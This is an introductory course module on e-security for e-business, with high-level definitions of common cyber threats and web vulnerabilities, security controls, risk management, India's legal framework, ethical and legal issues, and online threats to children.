MODULE 4

E- SECURITY

Information system security

Security refers to the policies, procedures and technical measures and to
prevent unauthorised access,alteration,theft or physical damage to information
systems.

The main objective of information security are :

●​ Availability objective: Information should be available and usable whenever it

is required.
●​ Confidentiality objective: This objective states that information should be
available to only those who have the right to access it.
●​ Integrity objective: As per this objective, information should be protected from
unauthorised alteration and modification.

Security on the internet

●​ Web security is also known as “Cybersecurity”. It basically means

protecting website or web application by detecting, preventing and responding to
cyber threats.
● It is a system of protection measures and protocols that can protect our website
or web application from being hacked or entered by unauthorized personnel.
 Network and web security risks

Hacking: Hacking is unauthorized intrusion into a computer or a network.

● The person engaged hacking activities is generally referred to as a hacker.
● A hacker is a person who gains unauthorised access to a computer network
for profit, criminal mischief or personal pleasure.
● Types of hackers : ■ White hat hackers
■ Black hat hackers
■ Grey hat hackers

Denial of service attack (DOS): A Denial-of-Service (DoS) attack is an attack

meant to shut down a machine or network, making it inaccessible to its intended users.
● DoS attacks accomplish this by flooding the target with traffic, or sending it
information that triggers a crash.

Viruses: A computer virus is a type of computer program that, when executed,

replicates itself by modifying other computer programs and inserting its own code.
● If this replication succeeds, the affected areas are then said to be "infected" with a
computer virus.

Trojan horses: In computing, a Trojan horse is any malware which misleads users
of its true intent.
● The term is derived from the Ancient Greek story of the deceptive Trojan Horse
that led to the fall of the city of Troy.
● Trojans can be employed by cyber-thieves and hackers trying to gain access to
users' systems.
● Users are typically tricked by some form of social engineering into loading and
executing Trojans on their systems.

Internet hoax: Internet hoaxes are stories that spread throughout theinternet, often
through email, forums, and blogs or showing images that are untrue or alteration of
the truth.
● It is usually an email urgingto pass this information to as many people to make
aware of this information.
● The only purpose of hoax is to waste time.

Worms: A computer worm is a standalone malware computer program that

replicates itself in order to spread to other computers.
● It often uses a computer network to spread itself, relying on security failures on the
target computer to access it.
● It will use this machine as a host to scan and infect other computers.
● Computer worms use recursive methods to copy themselves without host programs
and distribute themselves based on the law of exponential growth, thus controlling and
infecting more and more computers in a short time.

Spyware: Spyware is unwanted software that gain our computing device, stealing
internet usage data and sensitive information.
●Spyware is classified as a type of malware — malicious software designed to gain
access to or damage your computer, often without your knowledge. Spyware aims to
gather information about a person or organization and send such information to
another entity in a way that harms the user; for example by violating their privacy or
endangering their device's security.

Adware: often called advertising-supported software by its developers, is software

that generates revenue for its developer by automatically generating online
advertisements in the user interface of the software or on a screen presented to the
user during the installation process.
●The software may generate two types of revenue: one is for the display of the
advertisement and another on a "pay-per-click" basis, if the user clicks on the
advertisement.

Phishing: Phishing is the fraudulent attempt to obtain sensitive information or data,

such as usernames, passwords and credit card details or other sensitive details, by
impersonating oneself as a trustworthy entity in a digital communication.
● Phishing is a cybercrime in which a target or targets are contacted by email,
telephone or text message by someone posing as a legitimate institution to lure
individuals into providing sensitive data such as personally identifiable information,
banking and credit card details, and passwords.

Vulnerability
A weakness in security procedures, network design, or implementation that
can be exploited to violate a corporate security policy is called vulnerability.
● Internet attacks can be launched from anywhere in the world and the location of the
attacker can easily be hidden.
● New web based attack types are coming out every day; this is causing businesses,
communities and individuals to take security seriously now.

Types of vulnerability:

SQL injection: it is a code injection technique, used to attack data-driven

applications, in which malicious SQL statements are inserted into an entry field for
execution.
● SQL injection is one of the most common web hacking techniques.
● SQL injection is a code injection technique that might destroy our database.

Cross site scripting(XSS): It is a client-side code injection attack.

● The attacker aims to execute malicious scripts in a web browser of the victim by
including malicious code in a legitimate web page or web application.
● The actual attack occurs when the victim visits the web page or web application that
executes the malicious code. Broken authentication and session management:
● If the user authentication system of a website is weak, hackers can take full
advantage.
● Authentication systems involve passwords, session IDs, and cookies that can allow
a hacker to access user’s account from any computer.

Cross site request forgery attack:

● Cross-site request forgery (also known as CSRF) is a web security vulnerability
that allows an attacker to induce users to perform actions that they do not intend to
perform.
● In a successful CSRF attack, the attacker causes the victim user to carry out an
action unintentionally. For example, this might be to change the email address on their
account, to change their password, or to make a funds transfer. Depending on the
nature of the action, the attacker might be able to gain full control over the user's
account. .
● Cross-site request forgery, also known as one-click attack or session riding and
abbreviated as CSRF is a type of malicious exploit of a website where unauthorized
commands are submitted from a user that the web application trusts.

Clickjacking attack: Clickjacking is an attack that tricks a user into clicking a

webpage element which is invisible or disguised as another element.
● This can cause users to unwittingly download malware, visit malicious web pages,
provide credentials or sensitive information, transfer money, or purchase products
online.

Social engineering attack:

● It happens when the user reveal private information in good faith, such as a credit
card number, through common online interactions such as email, chat, social media
sites etc.

Website defacement: Website defacement is an attack on a website that changes the

visual appearance of a website or a web page. These are typically the work of
defacers, who break into a web server and replace the hosted website with one of their
own.
● Visitors may be redirected to a website with an address quite similar to the
company.

Cyber industrial espionage: Cyber espionage is a form of cyber attack that steals
classified, sensitive data or intellectual property to gain an advantage over a
competitive company or government entity. Espionage is “the practice of spying or
using spies to obtain information about the plans and activities especially of a foreign
government or a competing company.”

Credit card fraud and theft of customer data: Credit card fraud is an inclusive
term for fraud committed using a payment card, such as a credit card or debit card.
● The purpose may be to obtain goods or services, or to make payment to another
account which is controlled by a criminal.
● The most common types of fraud causing concern among merchants are identity
theft.

Network and web security

The goal of security management is to minimize risk and ensure

protection by limiting the impact of s security breach.

Monitor network performance: Network performance monitoring is a routine

process to evaluate, analyzes, report and track on the performance of a computer
network.

Username and password: Password protection allows only those with a authorized
password to gain access to certain information.

Use of firewall: It is a network security system designed to prevent unauthorized

access to or from a private network. It is a network security device that monitors
incoming and outgoing network traffic and decides whether to allow or block specific
traffic based on a defined set of security rules. Firewalls can be implemented as both
hardware and software, or a combination of both.

Intrusion detection: It is a system that monitors network traffic for suspicious

activity and issues alerts when such an activity is discovered. While anomaly
detection and reporting is the primary function, some intrusion detection systems are
capable of taking actions when malicious activity or anomalous traffic is detected.

Virus scanning software: It helps to scan and identify any malicious content and
removes it from the system.
 Transaction security and data protection

Encryption: It is the process of transforming plain text or data into cipher text
that can not be read by anyone other than the sender and the receiver.

Secure socket layer (SSL): The SSL protocol provides data encryption, server
authentication, optional client authentication,and message integrity for TCP/IP
connections.

Secure hypertext transfer protocol (S-HTTP): It is a secure message oriented

communications protocol designed for use in conjunction with HTTP.
Generally, S-HTTP attempts to make HTTP more secure.

Trusted seals programs: A number of trustmark seals have been developed to

provide assurance about web business practices and policies through the web
interface.

Digital signature: A digital signature is a technique used to validate the authenticity

and integrity of a message,software or digital document. It's the digital equivalent of a
handwritten signature or stamped seal, but it offers far more inherent security.

Secure electronic transaction (SET): It will enable payment security for all
involved, authenticate card holders and merchants,provide confidentiality for payment
data and define protocols.

Digital certificate: It is a digital document issued by a trusted third party institution

known as a certificate authority that contains the name of the subject or company, the
subject’s public key, a digital certificate serial number, an expiration date, the digital
signature of the certification authority and other identifying information. The
certificate is signed with the private key of the certification authority
 The firewall
In computing, a firewall is a network security system that monitors and
filter incoming and outgoing network traffic based on an organization's previously
established security policies. A firewall typically establishes a barrier between a
trusted network and an untrusted network, such as the Internet.
● The aim of this wall is to protect the premises network from internet based attacks
and to provide a single block point where security and auditing can be checked.

Protection from vulnerabilities: Internet connection is vulneration to hackers who

want to access financial and personal information.

Managing and controlling network traffic: This is the first and most basic function.
It should be able to identify which data packets are coming through, which connection
is established and also be able to control those traffic in the system.

Authentication access: The usage of packet filtering helps to restrict resource access
from unexpected sources. Acting as a intermediary: Instead of allowing computers
connect directly to the internet, a firewall is modified into an intermediary device to
the internet. The simplest mechanism for verification is asking users for a username
and password whenever they want to access the system.

Resource protection: Important task of a firewall is to protect the network resource

from outside threats.

Recording and reporting of events: Records all information about policy violated
activities and reports it to administrator.

Preventing access to information: It also used to limit the activities of their users
on the internet. Enforcing policy: Firewall enforce the rules about which network
traffic is allowed to enter or leave a network.

Auditing: If a security breach occurs, audit trails can be used to help determine
what had happened.
 E-business risk management issues

E-business risk management involves identifying and addressing potential risks

that businesses face when operating online. Here are key risk management
issues in e-business:

1. Cybersecurity Risks

●​ Vulnerability to hacking, malware, phishing, and data breaches.

●​ Management: Use firewalls, encryption, multi-factor authentication,
regular security audits, and employee training.

2. Privacy Risks

●​ Unauthorized access or misuse of personal and sensitive customer data.

●​ Management: Implement data protection policies, comply with privacy
laws (e.g., GDPR), and use secure data storage solutions.

3. Financial Risks

●​ Fraud, online payment security, or financial loss due to poor management

of e-commerce transactions.
●​ Management: Employ secure payment gateways, monitor transactions for
suspicious activity, and ensure proper financial controls.

4. Legal and Compliance Risks

●​ Risk of non-compliance with laws like intellectual property, consumer

protection, and data protection regulations.
●​ Management: Stay informed about legal requirements and ensure
adherence to them, especially when operating internationally.

5. Reputation Risks

●​ Negative online reviews, social media backlash, or failure to meet

customer expectations can harm the company’s reputation.
 ●​ Management: Monitor customer feedback, respond promptly to
complaints, and maintain high customer service standards.

6. Supply Chain and Operational Risks

●​ Disruptions in the supply chain or logistical issues that impact the ability
to deliver products or services.
●​ Management: Develop contingency plans, diversify suppliers, and use
technology to track inventory and shipments.

7. Technology Risks

●​ System downtime, technical failures, or software bugs that affect the

e-business operations.
●​ Management: Invest in robust IT infrastructure, perform regular software
updates, and have disaster recovery plans in place.

8. Intellectual Property Risks

●​ Theft of proprietary information, software, or content.

●​ Management: Secure intellectual property through patents, trademarks,
copyrights, and implement strong digital rights management (DRM).

9. Market and Competitive Risks

●​ Rapid changes in market trends or competition that can affect profitability.

●​ Management: Regularly analyze market trends, adjust business strategies,
and maintain a competitive edge.

10. Human Resource Risks

●​ Insider threats, lack of skilled staff, or high turnover rates that affect
e-business operations.
●​ Management: Focus on employee training, implement strict internal
controls, and build a strong organizational culture.
 Information security environment in india
India's information security environment is evolving, with increasing emphasis on
protecting data and digital infrastructure due to the rapid expansion of the internet and
digital economy. Below are key elements that shape India's information security
landscape:

1. Cybersecurity Challenges

●​ Growing Cyber Threats: India faces increasing cyber threats, including

hacking, ransomware, phishing attacks, and cyber terrorism. As digital adoption
grows, these threats have become more sophisticated.
●​ Data Privacy Concerns: With the rise of digital services, the risk of data
breaches and misuse of personal data is a growing concern.

2. Government Initiatives

●​ National Cyber Security Policy (NCSP): The government introduced the

NCSP in 2013 to safeguard the country’s cyberspace and create a secure
environment for e-governance and IT infrastructure.
●​ Cyber Security Infrastructure: Establishment of CERT-In (Computer
Emergency Response Team - India) to respond to cyber incidents and provide
guidelines for businesses and individuals to improve cybersecurity.
●​ Digital India: The "Digital India" program aims to increase digital literacy and
create secure online platforms, strengthening cybersecurity measures for
e-governance and other services.

3. Legal Framework

●​ Information Technology Act, 2000 (IT Act): Provides a legal framework for
electronic transactions, cybersecurity, and digital signatures, with provisions for
cybercrimes and data protection.
●​ Personal Data Protection Bill (PDPB): Currently under discussion, this bill
aims to regulate the processing of personal data, giving individuals control over
their data and enforcing penalties for non-compliance.
 ●​ Other Regulations: India is also aligning its cybersecurity laws with global
standards like GDPR to improve data protection and privacy.

4. Private Sector Role

●​ Cybersecurity Practices: Many Indian companies, particularly in the IT and

e-commerce sectors, are investing heavily in cybersecurity tools and training to
protect against cyber threats.
●​ Public-Private Collaboration: Government and private sector collaboration is
critical in advancing the country’s cybersecurity readiness, such as sharing
threat intelligence and implementing best practices.

5. Critical Infrastructure Protection

●​ India has identified critical infrastructure sectors like banking, power,

telecommunications, and healthcare as particularly vulnerable to cyber-attacks.
Efforts to protect these sectors have been a priority, with the introduction of
stricter guidelines and frameworks.

6. Capacity Building and Awareness

●​ Skill Development: There is a focus on building cybersecurity expertise

through academic courses, training programs, and certifications. The National
Institute of Electronics and Information Technology (NIELIT) and other
institutions play a significant role.
●​ Cybersecurity Awareness: Public awareness campaigns are growing to
educate individuals and organizations about best practices for cybersecurity.

7. International Cooperation

●​ Global Partnerships: India cooperates with international agencies like

INTERPOL, the United Nations, and other countries to combat cross-border
cybercrime and enhance global cybersecurity standards.
 Legal and ethical issues
Ethical issues deal with what is considered to be right and wrong.
● If anybody does something that is not legal, they are breaking the law, but if they
do something unethical, they may not be breaking the law.

Ethical Issues:

1.​ Web spoofing: It occurs when the attacker sets up a fake website which is
almost same as the original website in order to attract consumers to give their
credit card number or other personal information. Normally, the spoof website
will adopt the design of the target website, and it sometimes has a similar URL.

2.​ Cyber squatting: It means an activity in which a person or firm register,

purchase and uses the existing domain name, belonging to a well known
organization, for the purpose of infringing its trademark. Thecybersquatter then
offers to sell the domain to the person or company who owns a trademark
contained within the name at an inflated price.

3.​ Web tracking: Web tracking is the practice by which operators of websites
collect, store and share information about visitors’ activities on the World Wide
Web.

4.​ Identity theft: Identity theft occurs when someone uses another person's
personal identifying information, like their name, identifying number, or credit
card number, without their permission, to commit fraud or other crimes.

Legal Issue:

1.​ Cyberstalking: It is a criminal practice where an individual uses the internet to

systematically harass or threaten someone. This crime can be committed
through email,social media,chat rooms, instant messaging clients and any other
online medium. A stalker may be an online stranger or a person whom the
target knows.
 2.​ Application fraud on the internet: The small investors are attracted
by the promises of false profits by the stock promoters. The availability
of emails and popup ads have paved the way for financial criminals to have
access to many people.

3.​ Skimming: Skimming is the unauthorized capture and transfer of payment data
to another source. For example, information that is electronically stored on the
magnetic stripe of a credit card or debit card is illegally copied during an
attempt to use an automatic teller machine (ATM).

4.​ Copyright: Copyright is a type of intellectual property that gives its owner the
exclusive right to make copies of a creative work, usually for a limited time.
Unfortunately, it is easy for the computer to create an exact copy of
valuable software in seconds. Software piracy is widespread. It refers to
the unauthorized duplication of computer software.

Internet Gambling
It refers to the act of placing bets or playing games of chance for money through
online platforms. It includes activities such as online casinos, sports betting, poker,
bingo, and esports betting. The industry has grown significantly, driven by the rise of
internet accessibility and digital payment methods.

Types of Internet Gambling:

●​ Online Casinos: Games like slots, blackjack, and roulette.

●​ Sports Betting: Betting on outcomes of various sports events.
●​ Online Poker: Players compete in poker games for real money.
●​ Esports Betting: Betting on competitive video game tournaments.
●​ Bingo and Lottery: Online versions of these traditional gambling games.

Legal and Regulatory Issues: The legality of internet gambling varies by country and
region. Some countries, like the UK, have robust regulations, while others, like India,
have unclear or restrictive laws. Regulations typically aim to ensure fair play,
protect consumers, and prevent fraud and money laundering.

Risks:

●​ Addiction: Easy access to gambling can lead to problematic gambling behavior.

●​ Fraud and Scams: Not all gambling sites are legitimate, posing risks to
players.
●​ Privacy and Security: Personal and financial information may be exposed if
platforms lack proper security.

online threats to children

Children are increasingly exposed to a variety of online threats due to the widespread
use of digital devices and the internet. These threats can negatively affect their safety,
development, and well-being. Below is an overview of common online threats to
children:

1. Cyberbullying

●​ Cyberbullying involves the use of digital platforms (social media, gaming sites,
text messages) to harass, threaten, or belittle a child.
●​ Impact: Emotional distress, depression, anxiety, and sometimes physical harm.
Victims may experience a sense of isolation and diminished self-esteem.
●​ Prevention: Encourage open communication, monitor online activity, and
educate children on how to block or report cyberbullying incidents.

2. Online Predators

●​ Online predators are individuals who use the internet to exploit children for
sexual purposes or grooming. They may attempt to build relationships with
children through social media, chat rooms, or gaming platforms.
●​ Impact: Sexual exploitation, emotional manipulation, and physical harm.
 ●​ Prevention: Monitor online interactions, set privacy settings on social media,
and educate children about not sharing personal information online with
strangers.

3. Exposure to Inappropriate Content

●​ Children may unintentionally encounter inappropriate content, such as explicit

sexual material, violence, or disturbing images, through search engines, social
media, or video platforms.
●​ Impact: Psychological harm, confusion, and exposure to harmful ideas or
behaviors.
●​ Prevention: Use parental controls and safe search filters, restrict access to
certain websites, and talk openly about the potential dangers of certain content.

4. Online Gambling and Gaming Risks

●​ Children may be exposed to online gambling through gaming apps,

advertisements, or social media. Additionally, some online games have
mechanisms that encourage players to spend money.
●​ Impact: Addiction, financial loss, and exposure to gambling-related behaviors.
●​ Prevention: Use parental controls to restrict access to gambling sites or apps,
and educate children about the risks of online gaming and in-app purchases.

5. Identity Theft and Scams

●​ Children can become victims of identity theft if they share personal

information, such as their name, address, or social security number, with
malicious individuals or through insecure websites.
●​ Impact: Fraudulent activity, long-term damage to credit, and exposure to
scams.
●​ Prevention: Teach children not to share personal information online, ensure the
use of secure websites, and monitor financial accounts.
6. Online Radicalization

●​ Extremist groups or individuals may target children and adolescents online to

promote harmful ideologies, recruit for violence, or manipulate vulnerable
minds.
●​ Impact: Emotional distress, radicalized behavior, and the potential for
dangerous real-world actions.
●​ Prevention: Monitor social media usage, educate children on recognizing
extremist content, and encourage open dialogue about online experiences.

7. Sexting and Sharing Explicit Images

●​ Sexting refers to the exchange of sexually explicit images or messages.

Children and teens may be pressured into sending inappropriate content or
become victims of image-based abuse.
●​ Impact: Emotional harm, cyberbullying, blackmail, and potential legal
consequences.
●​ Prevention: Educate children about the risks of sexting, establish boundaries
for sharing personal content, and promote healthy online communication.

8. Addiction to Screen Time

●​ Excessive screen time can lead to addiction to social media, gaming, or

streaming services, which can affect physical health, sleep patterns, and social
skills.
●​ Impact: Health issues such as eye strain, sleep deprivation, lack of physical
activity, and weakened social relationships.
●​ Prevention: Set time limits on screen use, encourage outdoor activities, and
balance digital engagement with face-to-face interactions.

9. Phishing and Fraud

●​ Cybercriminals may use phishing schemes to trick children into sharing

personal information, such as login credentials or payment information, by
impersonating legitimate entities.
●​ Impact: Financial loss, privacy violations, and exposure to fraudulent activities.
 ●​ Prevention: Teach children how to recognize phishing attempts, monitor online
transactions, and use strong, unique passwords.

10. Unwanted Communication and Stalking

●​ Children may receive unsolicited messages or friend requests from strangers or

stalkers who seek to exploit or harm them.
●​ Impact: Emotional distress, feelings of being unsafe, and potential threats to
physical safety.
●​ Prevention: Teach children to reject unsolicited communication and report
suspicious messages to trusted adults or authorities.